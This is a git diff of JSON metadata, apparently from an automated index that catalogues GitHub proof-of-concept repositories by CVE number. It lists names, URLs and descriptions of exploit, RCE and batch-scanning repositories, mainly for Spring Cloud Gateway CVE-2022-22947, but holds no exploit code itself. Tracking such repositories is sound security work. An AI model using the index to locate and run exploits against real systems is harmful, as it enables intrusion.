"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22720.json b/2022/CVE-2022-22720.json new file mode 100644 index 0000000000..54633adddb --- /dev/null +++ b/2022/CVE-2022-22720.json @@ -0,0 +1,33 @@ +[ + { + "id": 723248102, + "name": "CVE-2022-22720", + "full_name": "Benasin\/CVE-2022-22720", + "owner": { + "login": "Benasin", + "id": 47447167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47447167?v=4", + "html_url": "https:\/\/github.com\/Benasin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Benasin\/CVE-2022-22720", + "description": null, + "fork": false, + "created_at": "2023-11-25T04:06:01Z", + "updated_at": "2023-11-25T04:06:54Z", + "pushed_at": "2023-11-25T04:06:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22733.json b/2022/CVE-2022-22733.json new file mode 100644 index 0000000000..22db38d4a7 --- /dev/null +++ b/2022/CVE-2022-22733.json @@ -0,0 +1,40 @@ +[ + { + "id": 632426945, + "name": "CVE-2022-22733", + "full_name": "Zeyad-Azima\/CVE-2022-22733", + "owner": { + "login": "Zeyad-Azima", + "id": 62406753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62406753?v=4", + "html_url": "https:\/\/github.com\/Zeyad-Azima", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeyad-Azima\/CVE-2022-22733", + "description": "Apache ShardingSphere ElasticJob-UI Privilege Escalation & RCE Exploit", + "fork": false, + "created_at": "2023-04-25T11:39:40Z", + "updated_at": "2024-06-09T10:36:58Z", + "pushed_at": "2023-05-22T12:49:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "apache2", + "exploit", + "java", + "shardingsphere", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2274.json b/2022/CVE-2022-2274.json new file mode 100644 index 0000000000..ce1054f484 --- /dev/null +++ b/2022/CVE-2022-2274.json @@ -0,0 +1,107 @@ +[ + { + "id": 540972496, + "name": "CVE-2022-2274", + "full_name": "Malwareman007\/CVE-2022-2274", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-2274", + "description": "A POC OF CVE-2022-2274 (openssl)", + "fork": false, + "created_at": "2022-09-24T21:30:34Z", + "updated_at": "2024-08-12T20:27:18Z", + "pushed_at": "2022-09-24T21:37:16Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-2274", + "open-ssl", + "poc", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 564845020, + "name": "OpenSSL-Vulnerability-Detection-Script", + "full_name": "EkamSinghWalia\/OpenSSL-Vulnerability-Detection-Script", + "owner": { + "login": "EkamSinghWalia", + "id": 106553324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4", + "html_url": "https:\/\/github.com\/EkamSinghWalia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EkamSinghWalia\/OpenSSL-Vulnerability-Detection-Script", + "description": "This is an OpenSSL Vulnerability Detection Script for CVE-2022-2274", + "fork": false, + "created_at": "2022-11-11T16:27:45Z", + "updated_at": "2022-11-11T16:28:31Z", + "pushed_at": "2022-11-11T16:28:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604407954, + "name": "CVE-2022-2274", + "full_name": "DesmondSanctity\/CVE-2022-2274", + "owner": { + "login": "DesmondSanctity", + "id": 51109125, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51109125?v=4", + "html_url": "https:\/\/github.com\/DesmondSanctity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DesmondSanctity\/CVE-2022-2274", + "description": "OpenSSL-src Heap Memory Corruption with RSA Private Key Operation : CVE-2022-2274", + "fork": false, + "created_at": "2023-02-21T01:56:51Z", + "updated_at": "2023-02-21T13:15:47Z", + "pushed_at": "2023-02-21T02:09:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "security", + "vulnerabilities", + "vulnerability-assessment" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22818.json b/2022/CVE-2022-22818.json new file mode 100644 index 0000000000..ca7fc2c7b2 --- /dev/null +++ b/2022/CVE-2022-22818.json @@ -0,0 +1,33 @@ +[ + { + "id": 576619933, + "name": "django-xss-example", + "full_name": "Prikalel\/django-xss-example", + "owner": { + "login": "Prikalel", + "id": 67920266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67920266?v=4", + "html_url": "https:\/\/github.com\/Prikalel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Prikalel\/django-xss-example", + "description": "This repo reproduce xss attack on django 4.0.1 (see CVE-2022-22818)", + "fork": false, + "created_at": "2022-12-10T12:38:08Z", + "updated_at": "2024-08-12T20:28:48Z", + "pushed_at": "2023-06-02T04:06:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22828.json b/2022/CVE-2022-22828.json new file mode 100644 index 0000000000..9e057abc78 --- /dev/null +++ b/2022/CVE-2022-22828.json @@ -0,0 +1,33 @@ +[ + { + "id": 452487266, + "name": "CVE-2022-22828", + "full_name": "videnlabs\/CVE-2022-22828", + "owner": { + "login": "videnlabs", + "id": 97770137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97770137?v=4", + "html_url": "https:\/\/github.com\/videnlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/videnlabs\/CVE-2022-22828", + "description": "Write-up of CVE-2022-22828", + "fork": false, + "created_at": "2022-01-27T00:29:47Z", + "updated_at": "2022-01-27T01:53:47Z", + "pushed_at": "2022-01-27T01:32:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22845.json b/2022/CVE-2022-22845.json new file mode 100644 index 0000000000..c8ea78034a --- /dev/null +++ b/2022/CVE-2022-22845.json @@ -0,0 +1,33 @@ +[ + { + "id": 463162355, + "name": "CVE-2022-22845-Exploit", + "full_name": "OmriBaso\/CVE-2022-22845-Exploit", + "owner": { + "login": "OmriBaso", + "id": 50461376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50461376?v=4", + "html_url": "https:\/\/github.com\/OmriBaso", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OmriBaso\/CVE-2022-22845-Exploit", + "description": "Exploit for CVE-2022-22845 - Unauthenticated Admin Takeover On QXIP SIPCAPTURE Homer-App up to 1.4.27", + "fork": false, + "created_at": "2022-02-24T13:40:12Z", + "updated_at": "2023-09-22T16:54:32Z", + "pushed_at": "2022-02-24T13:44:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22850.json b/2022/CVE-2022-22850.json new file mode 100644 index 0000000000..a0e4064ca1 --- /dev/null +++ b/2022/CVE-2022-22850.json @@ -0,0 +1,33 @@ +[ + { + "id": 451154958, + "name": "CVE-2022-22850", + "full_name": "Sant268\/CVE-2022-22850", + "owner": { + "login": "Sant268", + "id": 26564273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26564273?v=4", + "html_url": "https:\/\/github.com\/Sant268", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sant268\/CVE-2022-22850", + "description": null, + "fork": false, + "created_at": "2022-01-23T16:00:34Z", + "updated_at": "2022-01-24T06:20:46Z", + "pushed_at": "2022-01-27T02:37:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22851.json b/2022/CVE-2022-22851.json new file mode 100644 index 0000000000..bbcd4df0f8 --- /dev/null +++ b/2022/CVE-2022-22851.json @@ -0,0 +1,33 @@ +[ + { + "id": 451155234, + "name": "CVE-2022-22851", + "full_name": "Sant268\/CVE-2022-22851", + "owner": { + "login": "Sant268", + "id": 26564273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26564273?v=4", + "html_url": "https:\/\/github.com\/Sant268", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sant268\/CVE-2022-22851", + "description": null, + "fork": false, + "created_at": "2022-01-23T16:01:26Z", + "updated_at": "2022-01-24T06:20:47Z", + "pushed_at": "2022-01-27T03:04:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22852.json b/2022/CVE-2022-22852.json new file mode 100644 index 0000000000..7d4102d513 --- /dev/null +++ b/2022/CVE-2022-22852.json @@ -0,0 +1,33 @@ +[ + { + "id": 451155350, + "name": "CVE-2022-22852", + "full_name": "Sant268\/CVE-2022-22852", + "owner": { + "login": "Sant268", + "id": 26564273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26564273?v=4", + "html_url": "https:\/\/github.com\/Sant268", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sant268\/CVE-2022-22852", + "description": null, + "fork": false, + "created_at": "2022-01-23T16:01:49Z", + "updated_at": "2022-01-24T06:20:48Z", + "pushed_at": "2022-01-27T03:04:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22885.json b/2022/CVE-2022-22885.json new file mode 100644 index 0000000000..8a2e05404b --- /dev/null +++ b/2022/CVE-2022-22885.json @@ -0,0 +1,64 @@ +[ + { + "id": 786354615, + "name": "CVE-2022-22885-2", + "full_name": "miguelc49\/CVE-2022-22885-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-22885-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:38:50Z", + "updated_at": "2024-04-14T17:39:07Z", + "pushed_at": "2024-04-16T00:44:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354643, + "name": "CVE-2022-22885-1", + "full_name": "miguelc49\/CVE-2022-22885-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-22885-1", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:38:59Z", + "updated_at": "2024-04-14T17:39:04Z", + "pushed_at": "2024-04-16T00:44:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22909.json b/2022/CVE-2022-22909.json index a695f6e138..454d190823 100644 --- a/2022/CVE-2022-22909.json +++ b/2022/CVE-2022-22909.json @@ -29,5 +29,36 @@ "watchers": 5, "score": 0, "subscribers_count": 1 + }, + { + "id": 469830978, + "name": "CVE-2022-22909", + "full_name": "kaal18\/CVE-2022-22909", + "owner": { + "login": "kaal18", + "id": 55247170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55247170?v=4", + "html_url": "https:\/\/github.com\/kaal18", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kaal18\/CVE-2022-22909", + "description": " Exploits for Hotel Druid 3.0.3 - Remote Code Execution (RCE) CVE-2022-22909", + "fork": false, + "created_at": "2022-03-14T17:10:08Z", + "updated_at": "2024-08-12T20:21:33Z", + "pushed_at": "2022-03-14T18:02:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-22947.json b/2022/CVE-2022-22947.json index 9db294578c..a7355479f6 100644 --- a/2022/CVE-2022-22947.json +++ b/2022/CVE-2022-22947.json @@ -1,4 +1,97 @@ [ + { + "id": 465286921, + "name": "Spring-Cloud-Gateway-CVE-2022-22947", + "full_name": "lucksec\/Spring-Cloud-Gateway-CVE-2022-22947", + "owner": { + "login": "lucksec", + "id": 59011386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59011386?v=4", + "html_url": "https:\/\/github.com\/lucksec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lucksec\/Spring-Cloud-Gateway-CVE-2022-22947", + "description": "CVE-2022-22947", + "fork": false, + "created_at": "2022-03-02T11:58:55Z", + "updated_at": "2024-11-07T07:33:56Z", + "pushed_at": "2022-03-03T14:03:30Z", + "stargazers_count": 220, + "watchers_count": 220, + "has_discussions": false, + "forks_count": 59, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 59, + "watchers": 220, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 465652006, + "name": "cve-2022-22947", + "full_name": "scopion\/cve-2022-22947", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/cve-2022-22947", + "description": "poc for cve-2022-22947", + "fork": false, + "created_at": "2022-03-03T09:30:37Z", + "updated_at": "2022-03-03T09:27:45Z", + "pushed_at": "2022-03-03T09:27:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465686911, + "name": "spring-cve-2022-22947", + "full_name": "Vulnmachines\/spring-cve-2022-22947", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/spring-cve-2022-22947", + "description": "Spring cloud gateway code injection : CVE-2022-22947", + "fork": false, + "created_at": "2022-03-03T11:14:37Z", + "updated_at": "2024-02-01T01:28:59Z", + "pushed_at": "2022-03-03T11:27:18Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, { "id": 465724885, "name": "CVE-2022-22947_Rce_Exp", @@ -30,6 +123,719 @@ "score": 0, "subscribers_count": 1 }, + { + "id": 465838791, + "name": "CVE-2022-22947", + "full_name": "crowsec-edtech\/CVE-2022-22947", + "owner": { + "login": "crowsec-edtech", + "id": 97851186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97851186?v=4", + "html_url": "https:\/\/github.com\/crowsec-edtech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crowsec-edtech\/CVE-2022-22947", + "description": "Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)", + "fork": false, + "created_at": "2022-03-03T18:26:18Z", + "updated_at": "2024-08-12T20:21:12Z", + "pushed_at": "2022-03-04T21:10:45Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 39, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465862037, + "name": "SpringCloudGatewayRCE", + "full_name": "Tas9er\/SpringCloudGatewayRCE", + "owner": { + "login": "Tas9er", + "id": 57090266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57090266?v=4", + "html_url": "https:\/\/github.com\/Tas9er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tas9er\/SpringCloudGatewayRCE", + "description": "SpringCloudGatewayRCE - CVE-2022-22947 \/ Code By:Tas9er", + "fork": false, + "created_at": "2022-03-03T19:45:18Z", + "updated_at": "2025-01-03T05:45:42Z", + "pushed_at": "2022-03-03T20:44:25Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 465954802, + "name": "CVE-2022-22947", + "full_name": "Greetdawn\/CVE-2022-22947", + "owner": { + "login": "Greetdawn", + "id": 28551913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28551913?v=4", + "html_url": "https:\/\/github.com\/Greetdawn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Greetdawn\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-03-04T02:27:50Z", + "updated_at": "2024-12-17T18:28:40Z", + "pushed_at": "2022-03-04T03:22:02Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465956696, + "name": "Spring-Cloud-Gateway-CVE-2022-22947", + "full_name": "Summer177\/Spring-Cloud-Gateway-CVE-2022-22947", + "owner": { + "login": "Summer177", + "id": 37724670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37724670?v=4", + "html_url": "https:\/\/github.com\/Summer177", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Summer177\/Spring-Cloud-Gateway-CVE-2022-22947", + "description": "Spring Cloud Gateway远程代码执行漏洞", + "fork": false, + "created_at": "2022-03-04T02:36:02Z", + "updated_at": "2022-03-04T02:46:40Z", + "pushed_at": "2022-03-04T05:19:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465993918, + "name": "CVE-2022-22947", + "full_name": "BerMalBerIst\/CVE-2022-22947", + "owner": { + "login": "BerMalBerIst", + "id": 97208820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97208820?v=4", + "html_url": "https:\/\/github.com\/BerMalBerIst", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BerMalBerIst\/CVE-2022-22947", + "description": "Exp", + "fork": false, + "created_at": "2022-03-04T05:26:33Z", + "updated_at": "2023-01-09T05:36:31Z", + "pushed_at": "2022-03-04T05:33:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466011549, + "name": "CVE-2022-22947-Spring-Cloud-Gateway", + "full_name": "tangxiaofeng7\/CVE-2022-22947-Spring-Cloud-Gateway", + "owner": { + "login": "tangxiaofeng7", + "id": 45926593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926593?v=4", + "html_url": "https:\/\/github.com\/tangxiaofeng7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tangxiaofeng7\/CVE-2022-22947-Spring-Cloud-Gateway", + "description": "CVE-2022-22947批量", + "fork": false, + "created_at": "2022-03-04T06:38:26Z", + "updated_at": "2024-11-16T19:48:38Z", + "pushed_at": "2022-03-04T10:49:00Z", + "stargazers_count": 71, + "watchers_count": 71, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 71, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 466024451, + "name": "-cve-2022-22947-", + "full_name": "dingxiao77\/-cve-2022-22947-", + "owner": { + "login": "dingxiao77", + "id": 56961158, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56961158?v=4", + "html_url": "https:\/\/github.com\/dingxiao77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dingxiao77\/-cve-2022-22947-", + "description": " cve-2022-22947 spring cloud gateway 批量扫描脚本", + "fork": false, + "created_at": "2022-03-04T07:24:58Z", + "updated_at": "2024-08-12T20:21:13Z", + "pushed_at": "2022-03-04T08:14:45Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466061651, + "name": "CVE-2022-22947-goby", + "full_name": "flying0er\/CVE-2022-22947-goby", + "owner": { + "login": "flying0er", + "id": 16277259, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16277259?v=4", + "html_url": "https:\/\/github.com\/flying0er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flying0er\/CVE-2022-22947-goby", + "description": "日常更新一些顺手写的gobypoc,包含高危害EXP", + "fork": false, + "created_at": "2022-03-04T09:29:45Z", + "updated_at": "2022-03-04T09:29:42Z", + "pushed_at": "2022-03-04T05:47:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466067213, + "name": "CVE-2022-22947", + "full_name": "dbgee\/CVE-2022-22947", + "owner": { + "login": "dbgee", + "id": 46910972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46910972?v=4", + "html_url": "https:\/\/github.com\/dbgee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dbgee\/CVE-2022-22947", + "description": "Spring Cloud Gateway Actuator API 远程命令执行 CVE-2022-22947", + "fork": false, + "created_at": "2022-03-04T09:47:55Z", + "updated_at": "2022-03-07T16:39:03Z", + "pushed_at": "2022-03-04T09:54:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466074286, + "name": "cve-2022-22947", + "full_name": "nu0l\/cve-2022-22947", + "owner": { + "login": "nu0l", + "id": 54735907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54735907?v=4", + "html_url": "https:\/\/github.com\/nu0l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nu0l\/cve-2022-22947", + "description": "Spring-Cloud-Gateway-CVE-2022-22947", + "fork": false, + "created_at": "2022-03-04T10:10:12Z", + "updated_at": "2023-01-21T10:36:54Z", + "pushed_at": "2022-03-04T10:33:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466102092, + "name": "CVE-2022-22947-POC", + "full_name": "nanaao\/CVE-2022-22947-POC", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/CVE-2022-22947-POC", + "description": "CVE-2022-22947批量检测脚本,回显命令没进行正则,大佬们先用着,后续再更", + "fork": false, + "created_at": "2022-03-04T11:45:35Z", + "updated_at": "2024-08-12T20:21:13Z", + "pushed_at": "2022-03-04T11:36:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 466164154, + "name": "CVE-2022-22947-Rce_POC", + "full_name": "hunzi0\/CVE-2022-22947-Rce_POC", + "owner": { + "login": "hunzi0", + "id": 57057346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57057346?v=4", + "html_url": "https:\/\/github.com\/hunzi0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hunzi0\/CVE-2022-22947-Rce_POC", + "description": "批量url检测Spring-Cloud-Gateway-CVE-2022-22947", + "fork": false, + "created_at": "2022-03-04T14:58:02Z", + "updated_at": "2024-08-12T20:21:14Z", + "pushed_at": "2022-03-04T15:15:43Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466368589, + "name": "CVE-2022-22947", + "full_name": "22ke\/CVE-2022-22947", + "owner": { + "login": "22ke", + "id": 39191639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39191639?v=4", + "html_url": "https:\/\/github.com\/22ke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/22ke\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-03-05T06:19:46Z", + "updated_at": "2022-03-07T06:26:50Z", + "pushed_at": "2022-03-05T06:39:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466986315, + "name": "CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE", + "full_name": "M0ge\/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE", + "owner": { + "login": "M0ge", + "id": 62680449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62680449?v=4", + "html_url": "https:\/\/github.com\/M0ge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M0ge\/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE", + "description": "Spring Cloud Gateway远程代码执行漏洞POC,基于命令执行的基础上,增加了反弹shell操作", + "fork": false, + "created_at": "2022-03-07T07:24:13Z", + "updated_at": "2024-07-19T05:25:14Z", + "pushed_at": "2022-03-09T05:43:23Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + 